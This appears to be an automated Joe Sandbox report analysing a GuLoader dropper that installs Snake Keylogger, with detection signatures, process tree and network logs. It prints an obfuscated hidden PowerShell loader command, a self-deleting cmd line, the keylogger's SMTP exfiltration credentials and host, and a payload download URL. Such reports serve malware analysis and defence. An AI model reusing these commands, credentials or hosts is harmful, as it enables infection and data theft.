Edit tour

Windows Analysis Report
LPO-9180155-PDF.exe

Overview

General Information

Sample name:	LPO-9180155-PDF.exe
Analysis ID:	1481498
MD5:	3755ce1468a267b6e1084c8069b54a8c
SHA1:	5473fb79e1d8d4089a62a8e5fd120068aac6be59
SHA256:	37f65665252e8b5cc41b3a3a8e2c539141f24f347a86332415a4e1af69d5bc0c
Tags:	exesigned
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Snake Keylogger

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Hides threads from debuggers

Powershell drops PE file

Sigma detected: Suspicious Script Execution From Temp Folder

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

System is w10x64

LPO-9180155-PDF.exe (PID: 4912 cmdline: "C:\Users\user\Desktop\LPO-9180155-PDF.exe" MD5: 3755CE1468A267B6E1084C8069B54A8C)

powershell.exe (PID: 1864 cmdline: "powershell.exe" -windowstyle hidden "$Fingereringerne=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fernland.Reg';$Attributnavn=$Fingereringerne.SubString(75282,3);.$Attributnavn($Fingereringerne) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Forbundsstater.exe (PID: 7032 cmdline: "C:\Users\user\AppData\Local\Temp\Forbundsstater.exe" MD5: 3755CE1468A267B6E1084C8069B54A8C)

cmd.exe (PID: 3748 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\Forbundsstater.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 6360 cmdline: choice /C Y /N /D Y /T 3 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "sendqvivid@xiagin.shop", "Password": "KdPl62NueMA3", "Host": "xiagin.shop", "Port": "587"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.2674791850.0000000021461000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.2547573653.0000000008F0F000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: Forbundsstater.exe PID: 7032	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell.exe" -windowstyle hidden "$Fingereringerne=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fernland.Reg';$Attributnavn=$Fingereringerne.SubString(75282,3);.$Attributnavn($Fingereringerne) ", CommandLine: "powershell.exe" -windowstyle hidden "$Fingereringerne=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fernland.Reg';$Attributnavn=$Fingereringerne.SubString(75282,3);.$Attributnavn($Fingereringerne) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LPO-9180155-PDF.exe", ParentImage: C:\Users\user\Desktop\LPO-9180155-PDF.exe, ParentProcessId: 4912, ParentProcessName: LPO-9180155-PDF.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Fingereringerne=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fernland.Reg';$Attributnavn=$Fingereringerne.SubString(75282,3);.$Attributnavn($Fingereringerne) ", ProcessId: 1864, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Fingereringerne=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fernland.Reg';$Attributnavn=$Fingereringerne.SubString(75282,3);.$Attributnavn($Fingereringerne) ", CommandLine: "powershell.exe" -windowstyle hidden "$Fingereringerne=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fernland.Reg';$Attributnavn=$Fingereringerne.SubString(75282,3);.$Attributnavn($Fingereringerne) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LPO-9180155-PDF.exe", ParentImage: C:\Users\user\Desktop\LPO-9180155-PDF.exe, ParentProcessId: 4912, ParentProcessName: LPO-9180155-PDF.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Fingereringerne=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fernland.Reg';$Attributnavn=$Fingereringerne.SubString(75282,3);.$Attributnavn($Fingereringerne) ", ProcessId: 1864, ProcessName: powershell.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 52.165.165.26 - Destination IP: 192.168.2.5

Timestamp:	2024-07-25T10:13:50.435466+0200
SID:	2022930
Source Port:	443
Destination Port:	59958
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.5 - Destination IP: 132.226.247.73

Timestamp:	2024-07-25T10:13:56.708885+0200
SID:	2803274
Source Port:	59960
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 188.114.97.3

Timestamp:	2024-07-25T10:13:57.311360+0200
SID:	2803305
Source Port:	59962
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.2.5 - Destination IP: 108.167.181.251

Timestamp:	2024-07-25T10:13:53.606674+0200
SID:	2803270
Source Port:	59959
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.5 - Destination IP: 132.226.247.73

Timestamp:	2024-07-25T10:13:59.599663+0200
SID:	2803274
Source Port:	59965
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 52.165.165.26 - Destination IP: 192.168.2.5

Timestamp:	2024-07-25T10:13:22.527029+0200
SID:	2022930
Source Port:	443
Destination Port:	49706
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.5 - Destination IP: 132.226.247.73

Timestamp:	2024-07-25T10:13:58.302622+0200
SID:	2803274
Source Port:	59963
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.5 - Destination IP: 132.226.247.73

Timestamp:	2024-07-25T10:13:55.099487+0200
SID:	2803274
Source Port:	59960
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000006.00000002.2674791850.0000000021461000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sendqvivid@xiagin.shop", "Password": "KdPl62NueMA3", "Host": "xiagin.shop", "Port": "587"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe

ReversingLabs: Detection: 34%

Multi AV Scanner detection for submitted file

Source: LPO-9180155-PDF.exe

ReversingLabs: Detection: 34%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: LPO-9180155-PDF.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:59961 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 108.167.181.251:443 -> 192.168.2.5:59959 version: TLS 1.2

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2547109082.0000000008429000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb55qr source: powershell.exe, 00000002.00000002.2544370653.000000000734E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: stem.Core.pdb$ source: powershell.exe, 00000002.00000002.2544370653.00000000073E2000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405770
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Code function: 0_2_0040622B FindFirstFileW,FindClose,	0_2_0040622B
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Code function: 0_2_0040276E FindFirstFileW,	0_2_0040276E
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Code function: 6_2_0040276E FindFirstFileW,	6_2_0040276E
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Code function: 6_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	6_2_00405770
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Code function: 6_2_0040622B FindFirstFileW,FindClose,	6_2_0040622B

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\forgrovelse\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 108.167.181.251 108.167.181.251
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: global traffic	HTTP traffic detected: GET /wp-includes/IoNHObzRr183.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.reap.skyestates.com.mtCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:59961 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /wp-includes/IoNHObzRr183.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.reap.skyestates.com.mtCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: www.reap.skyestates.com.mt
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: Forbundsstater.exe, 00000006.00000002.2674791850.00000000215C3000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002160C000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215B6000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002161A000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.0000000021523000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: Forbundsstater.exe, 00000006.00000002.2674791850.00000000215C3000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002160C000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.0000000021566000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215B6000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215EC000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002161A000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.0000000021517000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.0000000021523000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Forbundsstater.exe, 00000006.00000002.2674791850.0000000021461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: LPO-9180155-PDF.exe, Forbundsstater.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2542661803.0000000005B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2539524436.0000000004C16000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Forbundsstater.exe, 00000006.00000002.2674791850.00000000215C3000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002160C000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002153B000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215B6000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002161A000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: LPO-9180155-PDF.exe, Forbundsstater.exe.2.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: LPO-9180155-PDF.exe, Forbundsstater.exe.2.dr	String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000002.00000002.2539524436.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.0000000021461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: LPO-9180155-PDF.exe, Forbundsstater.exe.2.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: LPO-9180155-PDF.exe, Forbundsstater.exe.2.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: LPO-9180155-PDF.exe, Forbundsstater.exe.2.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 00000002.00000002.2539524436.0000000004C16000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2539524436.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBeq
Source: powershell.exe, 00000002.00000002.2542661803.0000000005B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2542661803.0000000005B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2542661803.0000000005B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: LPO-9180155-PDF.exe, Forbundsstater.exe.2.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: LPO-9180155-PDF.exe, Forbundsstater.exe.2.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: LPO-9180155-PDF.exe, Forbundsstater.exe.2.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: powershell.exe, 00000002.00000002.2539524436.0000000004C16000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2542661803.0000000005B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Forbundsstater.exe, 00000006.00000002.2674791850.00000000215C3000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002160C000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.0000000021566000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215B6000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002161A000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.0000000021523000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Forbundsstater.exe, 00000006.00000002.2674791850.0000000021523000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Forbundsstater.exe, 00000006.00000002.2674791850.00000000215D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: Forbundsstater.exe, 00000006.00000002.2674791850.00000000215C3000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002160C000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.0000000021566000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215B6000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002161A000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: Forbundsstater.exe, 00000006.00000002.2662544799.0000000005589000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.reap.skyestates.com.mt/
Source: Forbundsstater.exe, 00000006.00000002.2662544799.0000000005589000.00000004.00000020.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2662922690.0000000006F20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.reap.skyestates.com.mt/wp-includes/IoNHObzRr183.bin
Source: Forbundsstater.exe, 00000006.00000002.2662544799.0000000005589000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.reap.skyestates.com.mt/wp-includes/IoNHObzRr183.bino

Source: unknown	Network traffic detected: HTTP traffic on port 59968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59972 -> 443
